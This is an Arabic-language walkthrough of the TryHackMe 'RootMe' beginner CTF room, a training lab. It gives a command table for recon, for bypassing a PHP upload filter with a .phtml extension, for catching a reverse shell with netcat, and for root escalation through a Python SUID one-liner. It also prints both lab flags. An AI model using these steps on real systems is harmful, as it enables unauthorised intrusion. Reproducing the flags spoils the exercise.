RootMe هي غرفة CTF مصممة للمبتدئين على TryHackMe.
الهدف بسيط: Can you root me? — هتمشي من الـ Reconnaissance للـ Root
في رحلة كاملة تشمل Web Exploitation عن طريق ثغرة File Upload،
ثم Privilege Escalation باستخدام Python SUID.
الـ target بيشتغل على port 80 بـ Apache وport 22 بـ SSH.
هتلاقي hidden directory اسمه /panel/ فيه upload form،
وتاني directory اسمه /uploads/ هتنفّذ منه الـ Reverse Shell.
أكمل اللاب واحصل على الـ Badge الرسمي — أضفه لملفك على LinkedIn
فحص الـ ports: بتلاقي port 22 (SSH) وport 80 (HTTP/Apache 2.4.29)
port 22port 80Apache 2.4.29فحص الـ directories: بتلاقي /panel/ (upload form) و/uploads/ (ملفاتك المرفوعة)
/panel//uploads/الـ server بيبلوك .php — غيّر الـ extension لـ .phtml أو .php5 ورفع الـ reverse shell
.phtml bypassNetcat listenerبعد الـ shell، ابحث عن الـ user flag في /var/www/
THM{y0u_g0t_a_sh3ll}ابحث عن files بـ SUID: find / -perm /4000 — هتلاقي /usr/bin/python
بعد الـ Privilege Escalation، اقرأ الـ root flag من /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}| الأمر | الهدف | المرحلة |
|---|---|---|
| nmap -sV -sC -A <IP> | فحص الـ ports والـ services | Recon |
| gobuster dir -u http://<IP> -w <wl> | اكتشاف /panel/ و/uploads/ | Enum |
| mv shell.php shell.phtml | bypass الـ PHP upload filter | Bypass |
| nc -lvnp 4444 | فتح Netcat listener | Shell |
| find / -perm /4000 2>/dev/null | البحث عن SUID files | PrivEsc |
| python -c 'import os; os.execl("/bin/sh", "sh", "-p")' | استغلال Python SUID للـ root | Root |
| find / -name "user.txt" 2>/dev/null | إيجاد الـ user flag | Flag |
| cat /root/root.txt | قراءة الـ root flag | Flag |
| python3 -c 'import pty;pty.spawn("/bin/bash")' | تحسين الـ shell (TTY) | Shell |
Connect to TryHackMe VPN · Deploy the target machine
nmap scan · 2 open ports · Apache version · SSH service · Gobuster /panel/ /uploads/
Upload PHP reverse shell · Bypass .php filter (.phtml) · Netcat listener · find user.txt
find SUID files · python /usr/bin · GTFOBins exploit · read /root/root.txt